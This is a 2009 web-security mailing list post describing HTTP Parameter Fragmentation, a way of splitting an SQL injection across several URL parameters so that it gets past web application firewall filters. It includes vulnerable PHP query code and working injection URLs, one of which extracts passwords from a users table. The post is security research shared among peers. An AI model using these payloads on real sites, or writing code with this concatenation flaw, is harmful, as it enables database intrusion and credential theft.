[WEB SECURITY] HTTP parameters fragmentation

Dmitriy Evteev devteev at ptsecurity.com
Wed Aug 19 10:13:16 EDT 2009


While preparing an article about WAF bypassing methods, I found an
interesting way to bypass filters via HTTP parameters fragmentation. 

 

Vulnerable code example

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);

 

The following request doesn't allow to conduct an attack

index.php?a=1+union+select+1,2/*

 

The following request's succeeded using HPF

index.php?a=1+union/*&b=*/select+1,2

 

In the case, SQL request looks like

select * from table where a=1 union/* and b=*/select 1,2

 

Another example:

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit
".$_GET['c']);

Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." order
by ".$_GET['c']." limit 1");

 

Using HPF (HTTP Parameter Fragmentation), the request's succeeded:

index.php?a=1+union/*&b=*/select+1,2,pass/*&c=*/from+users--

 

The question is: is there any name for the technique? Please, advise me if
you know articles or experts in  the field (for example, I found a reference
in
http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-Fa
voriteXSS-SLIDES.pdf, page 79). 

Thank you for help and cooperation in advance!

 

- - - - - - - - - - - - - - - 
Best Regards, Dmitry Evteev 
Positive Technologies Co. 
Tel.: (495) 744-0144 
Web: http://www.ptsecurity.ru

 

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090819/ecf29e34/attachment.html>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 3169 bytes
Desc: not available
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090819/ecf29e34/attachment.p7s>


More information about the websecurity mailing list